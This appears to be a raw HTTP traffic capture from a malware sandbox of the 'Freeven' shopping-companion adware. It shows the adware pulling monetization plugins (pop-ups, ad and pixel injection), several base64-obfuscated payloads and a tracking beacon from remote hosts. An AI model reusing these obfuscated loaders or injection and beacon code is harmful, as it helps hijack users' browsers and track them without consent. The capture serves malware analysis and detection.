GET /plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1405929866"

Last-Modified: Mon, 21 Jul 2014 08:04:26 GMT

Cache-Control: max-age=142

Content-Length: 508

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds026.fr7.c
appAPI.internal.monetization = appAPI.internal.monetization || {};.if 
(typeof appAPI.internal.monetization.plugins === "undefined") { appAPI
.internal.monetization.plugins = {}; }..appAPI.internal.monetization.p
lugins[226] = function() {..if (appAPI.internal.monetization.loader &&
 appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.
monetization.getCampaignId) {...if (appAPI.internal.monetization.getCa
mpaignId() == 0) {....appAPI.internal.monetization.loader.setCampaignI
d(1026);...}..}.};....


GET /plugins/mins/221.js?ver=4&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1404650838"

Last-Modified: Sun, 06 Jul 2014 12:47:18 GMT

Cache-Control: max-age=900

Content-Length: 413

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds015.fr7.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
monetization.plugins={};}appAPI.internal.monetization.plugins[221]=fun
ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
on.shouldRunByVertical(221,["pops"])){return;}new (appAPI.internal.mon
etization.plugins.ICMBaseManager({namespace:"DOWNLOADS"}))();};
....


GET /plugins/mins/195.js?ver=28&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1404650834"

Last-Modified: Sun, 06 Jul 2014 12:47:14 GMT

Cache-Control: max-age=900

Content-Length: 408

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds008.fr7.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
monetization.plugins={};}appAPI.internal.monetization.plugins[195]=fun
ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
on.shouldRunByVertical(195,["pops"])){return;}new (appAPI.internal.mon
etization.plugins.ICMBaseManager({namespace:"LITE"}))();};....


GET /plugins/mins/7.js?ver=2&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1402409611"

Last-Modified: Tue, 10 Jun 2014 14:13:31 GMT

Cache-Control: max-age=900

Content-Length: 683

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668153.cds037.fr7.c
appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[
a]=b;},removeHook:function(a){delete this.hooks[a];},register:function
(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this
.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hook
s[b])))(a):null;},getClass:(function(a){return function(){return{liste
ners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});}
,removeListener:function(c,d){var b=[];a.each(this.listeners,function(
e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent
:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.nam
e){e.fn.call(this,c);}},this));}};};}($jquery_171))};....


GET /plugins/mins/193.js?ver=9&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1408273131"

Last-Modified: Sun, 17 Aug 2014 10:58:51 GMT

Cache-Control: max-age=900

Content-Length: 867

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds008.fr7.c

if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MD
IwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEy
MDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YT
FiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0
MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1ND
UxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2
NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0Nj
UyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1
MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMT
kwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNl
MzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0Zj
JjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0
ZjdhMWI=', 'fhsakzfpmp'); }....

GET /plugins/mins/180.js?ver=12&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1405846499"

Last-Modified: Sun, 20 Jul 2014 08:54:59 GMT

Cache-Control: max-age=900

Content-Length: 1383

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds020.fr7.c

if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMT
AwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQz
MWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZj
M0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEz
ODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMD
AwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMx
NGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OT
ViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMy
ZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0Mz
YyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4
MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NT
BkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2Mz
ODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNG
YzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVj
NWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QzYjM5MjkzNTJkMjQyYj
MxMzg0NDU4NTg1YTE1MTcwYjVlNTM1MTUxNTk1ODVhMDE0NTVlNTg1ZDUwNTA1ODUzNWE1
MzQ0NTg1ODVjNDExNjBiMDMwODVhMmQzMjJjM2MyODMxM2QzODI1MjMzNzNmMzAyZjM3Mz
IzMTIzMjgzODJkNGIxYjFiMGUwNjUzMzUzMzI0MjAyMjNjM2QzNTJiMmEyZjNlMzgzYjIz
M2MzYTI2MmUyMjJmM2UzODI3M2UyYTNjMzgyYjJhMzUzMzQ1NWU2NzY2NGMxNzBlMWIwZD
A1MDkzYjA5NGQ1NDQ3NTM1NjVhNjYxYQ==', 'njlgrmongb'); }....

<<< skipped >>>

GET /plugins/mins/91.js?ver=135&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1427097623"

Last-Modified: Mon, 23 Mar 2015 08:00:23 GMT

Cache-Control: max-age=492

Content-Length: 187756

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds012.fr7.c
(function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};
var a=function(at){if(typeof at=="string"&&typeof at.trim=="function")
{return at.trim();}return at==null?"":at.toString().replace(/^\s /,"")
.replace(/\s $/,"");};function f(at){var au=z[at]={},av,aw;at=at.split
(/\s /);for(av=0,aw=at.length;av<aw;av  ){au[at[av]]=true;}return a
u;}var H=function(at,au){var aw=[];for(var av=0;av<at.length;av  ){
if(av in at){var ax=au(at[av],av,at);if(ax!=null){aw.push(ax);}}}retur
n aw;};var ad=function(aw,az,av){var au,ax=0,ay=aw.length,at=ay===unde
fined||appAPI.utils.isFunction(aw);if(av){if(at){for(au in aw){if(az.a
pply(aw[au],av)===false){break;}}}else{for(;ax<ay;){if(az.apply(aw[
ax  ],av)===false){break;}}}}else{if(at){for(au in aw){if(az.call(aw[a
u],au,aw[au])===false){break;}}}else{for(;ax<ay;){if(az.call(aw[ax]
,ax,aw[ax  ])===false){break;}}}}return aw;};var J=function(av){av=av?
(z[av]||f(av)):{};var aA=[],aB=[],aw,ax,au,ay,az,aD=function(aE){var a
F,aI,aH,aG,aJ;for(aF=0,aI=aE.length;aF<aI;aF  ){aH=aE[aF];aG=appAPI
.utils.isArray(aH)?"array":(appAPI.utils.isFunction(aH)?"function":"")
;if(aG==="array"){aD(aH);}else{if(aG==="function"){if(!av.unique||!aC.
has(aH)){aA.push(aH);}}}}},at=function(aF,aE){aE=aE||[];aw=!av.memory|
|[aF,aE];ax=true;az=au||0;au=0;ay=aA.length;for(;aA&&az<ay;az  ){if
(aA[az].apply(aF,aE)===false&&av.stopOnFalse){aw=true;break;}}ax=false
;if(aA){if(!av.once){if(aB&&aB.length){aw=aB.shift();aC.fireWith(aw[0]
,aw[1]);}}else{if(aw===true){aC.disable();}else{aA=[];}}}},aC={add<<< skipped >>>

GET /plugins/mins/345.js?ver=13&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1426517806"

Last-Modified: Mon, 16 Mar 2015 14:56:46 GMT

Cache-Control: max-age=900

Content-Length: 645

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds012.fr7.c

__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,
170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,26
4,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,
368,372,374,379,387,388,393],pops:[108,127,155,170,179,190,195,197,208
,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,3
41,343,346,347,356,357,358,390],intext:[103,117,123,142,259,263,342,35
9,360,391],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200
,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,2
88,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371
,375,385,389]};....

GET /plugins/mins/253.js?ver=2&rnd=6500 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1417718237"

Last-Modified: Thu, 04 Dec 2014 18:37:17 GMT

Cache-Control: max-age=900

Content-Length: 735

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668153.cds026.fr7.c

if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MT
gxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBm
NGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MD
dmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQx
MTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1Mj
UyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3
MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMz
U2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYw
OTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMD
QxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAz
NDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }....

GET /plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6500 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1407922596"

Last-Modified: Wed, 13 Aug 2014 09:36:36 GMT

Cache-Control: max-age=805

Content-Length: 94779

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668153.cds026.fr7.c
var jQuery = $jquery_171 = $jquery = null;..if (document && typeof doc
ument.getElementById !== "undefined") {../*! jQuery v1.7.1 jquery.com 
| jquery.org/license */.(function(a,b){function cy(a){return f.isWindo
w(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){
if(!ck[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("disp
lay");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("ifram
e"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl
.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.w
rite((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<htm
l><body>"),cm.close();d=cm.createElement(a),cm.body.appendChi
ld(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}func
tion cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),functio
n(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(c
t,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("M
icrosoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRe
quest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.da
taType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(
g=1;g<i;g  ){if(g===1)for(h in a.converters)typeof h=="string"&&(e[
h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!
=="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p=b;for(o in e){j=o.s
plit(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k];if(p){o=e[o],o===!0
?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from " <<< skipped >>>

GET /apps.gif?action=update&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&subid=0&zdata=0&appver=111&bgver=1&pluginsver=103&curtime=1427668154&lifetime=32&oldappver=22&oldbgver=1&oldpluginsver=17&rnd=270 HTTP/1.1

Accept: */*

Host: stats.clientstaticserv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 0MDsJw0wieJKNphn6oEhWe3FuJFCpMROJRepge/i3uG2VsN/u5mYBOAnPcwYVkAvpHrXcXsSUi0=

x-amz-request-id: 8DB28FFF27574AB6

Date: Sun, 29 Mar 2015 22:29:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;..

GET /plugin/apps/54248/manifest/1_34_05_04/ie6/manifest.xml?ver=22&rnd=677 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.clientstaticserv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:10 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1427642855"

Last-Modified: Sun, 29 Mar 2015 15:27:35 GMT

Cache-Control: max-age=900

Content-Length: 1708

Content-Type: text/xml; charset=UTF-8

X-HW: 1427668151.dop005.fr7.t,1427668150.cds020.fr7.e
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>.  <V
er>111</Ver>.  <ShortName>Freeven pro</ShortName>
.  <Description>Feven Shopping Companion</Description>.  &
lt;PublisherName>Freeven</PublisherName>.  <HomePageLink&g
t;NA</HomePageLink>.  <JSLink>hXXp://js.ourstatsstaticstac
k.com/plugin/apps/54248/js/na/ie/app_code.js</JSLink>.  <Grou
pID>0</GroupID>.  <Domain>NA</Domain>.  <RunIn
Iframe>false</RunInIframe>.  <ThanksURL>NA</ThanksUR
L>.  <EmailSignature>NA</EmailSignature>.  <Settings
URL>NA</SettingsURL>.  <CertifiedInstall>NA</Certifi
edInstall>.  <ExposeSites>NA</ExposeSites>.  <Remote
FBApiURL>NA</RemoteFBApiURL>.  <DisableIE>true</Disa
bleIE>.  <DisableFF>true</DisableFF>.  <EnableSearch
IE>false</EnableSearchIE>.  <EnableSearchFF>false</E
nableSearchFF>.  <AddressbarIE>NA</AddressbarIE>.  <
AddressbarFF>NA</AddressbarFF>.  <AddressbarFFEnhanced>
NA</AddressbarFFEnhanced>.  <AddressbarCR>NA</Addressba
rCR>.  <NewTabURL>NA</NewTabURL>.  <NewTabEmbed>N
A</NewTabEmbed>.  <OpenSearchURL>NA</OpenSearchURL>.
  <BackgroundJS>hXXp://js.ourstatsstaticstack.com/plugin/apps/54
248/bg/na/ie/bg_code.js</BackgroundJS>.  <BackgroundVer>1&
lt;/BackgroundVer>.  <Manifest>NA</Manifest>.  <<<< skipped >>>

GET /plugin/apps/54248/js/na/ie/app_code.js?ver=111&rnd=2816 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1427498129"

Last-Modified: Fri, 27 Mar 2015 23:15:29 GMT

Cache-Control: max-age=900

Content-Length: 3

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668151.dop002.fr7.t,1427668152.cds032.fr7.pr

.......

GET /plugin/apps/54248/plugins/na/ie/plugins.json?ver=103&rnd=9831 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1427498130"

Last-Modified: Fri, 27 Mar 2015 23:15:30 GMT

Cache-Control: max-age=900

Content-Length: 17425

Content-Type: text/plain; charset=UTF-8

X-HW: 1427668152.dop002.fr7.t,1427668152.cds006.fr7.pr
{.."plugins_version": 103,.."plugins_list":.    [.      {"id":4,"url":
"hXXp://js.ourstatsstaticstack.com/plugins/javascripts/jquery-1_7_1_mi
n.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"c
h":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":
10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"
order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.ourstatsstatic
stack.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"i
e":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targe
ts":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":
true},{"id":3,"url":"hXXp://js.ourstatsstaticstack.com/plugins/mins/3.
js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":f
alse,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":
10300},{"run_at":2,"order":10300}],"enabled":true},{"id":47,"url":"htt
p://js.ourstatsstaticstack.com/plugins/mins/47.js","ver":3,"name":"res
ources_background","browsers":{"ie":true,"ff":true,"ch":true,"sf":true
,"nv":false,"px":false},"targets":[{"run_at":0,"order":30000},{"run_at
":5,"order":30000}],"enabled":true},{"id":246,"url":"hXXp://js.ourstat
sstaticstack.com/plugins/mins/246.js","ver":17,"name":"setup","browser
s":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targ
ets":[{"run_at":0,"order":5},{"run_at":1,"order":5}],"enabled":true},{
"id":253,"url":"hXXp://js.ourstatsstaticstack.com/plugins/mins/253.js"
,"ver":2,"name":"pixel_inject","browsers":{"ie":true,"ff":true,"ch<<< skipped >>>

GET /plugins/mins/42.js?ver=10&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1409568411"

Last-Modified: Mon, 01 Sep 2014 10:46:51 GMT

Cache-Control: max-age=185

Content-Length: 7866

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668152.dop002.fr7.t,1427668152.cds034.fr7.c
var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof 
appAPI==="undefined"){appAPI={};}appAPI.__should_activate_validation__
=true;(function(a){if(typeof window=="undefined"){window={};}if(typeof
 window.document==="undefined"){window.document={};document=window.doc
ument;}if(typeof window.alert==="undefined"){window.alert=function(b){
var c;if(typeof b==="undefined"){c="undefined";}else{if(b===null){c="n
ull";}else{c=b.toString();}}if(typeof c==="string"){a.alert(c);}};aler
t=window.alert;}})(appAPIinternal);if(typeof console==="undefined"){wi
ndow.console={};console=window.console;}if(typeof console.log==="undef
ined"){window.console.log=function(a){};console.log=window.console.log
;}if(typeof console.info==="undefined"){window.console.info=function(a
){};console.info=window.console.info;}if(typeof console.warn==="undefi
ned"){window.console.warn=function(a){};console.warn=window.console.wa
rn;}if(typeof console.error==="undefined"){window.console.error=functi
on(a){};console.error=window.console.error;}if(typeof console.assert==
="undefined"){window.console.assert=function(a){};console.assert=windo
w.console.assert;}if(typeof console.dir==="undefined"){window.console.
dir=function(a){};console.dir=window.console.dir;}if(typeof console.cl
ear==="undefined"){window.console.clear=function(a){};console.clear=wi
ndow.console.clear;}if(typeof console.profile==="undefined"){window.co
nsole.profile=function(a){};console.profile=window.console.profile;}if
(typeof console.profileEnd==="undefined"){window.console.profileEn<<< skipped >>>

GET /plugins/mins/391.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1426068985"

Last-Modified: Wed, 11 Mar 2015 10:16:25 GMT

Cache-Control: max-age=900

Content-Length: 795

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668152.dop002.fr7.t,1427668152.cds025.fr7.c

if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNT
M1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBl
MTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYT
NhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYx
ODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMz
AzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQw
MDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMD
BjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2Ey
MjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MD
I1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1
MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MD
U5MTY=', 'bihkugxhrq'); }....

GET /plugins/mins/380.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1424181436"

Last-Modified: Tue, 17 Feb 2015 13:57:16 GMT

Cache-Control: max-age=900

Content-Length: 1303

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668152.dop002.fr7.t,1427668152.cds022.fr7.c

if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMG
EwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1
NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYj
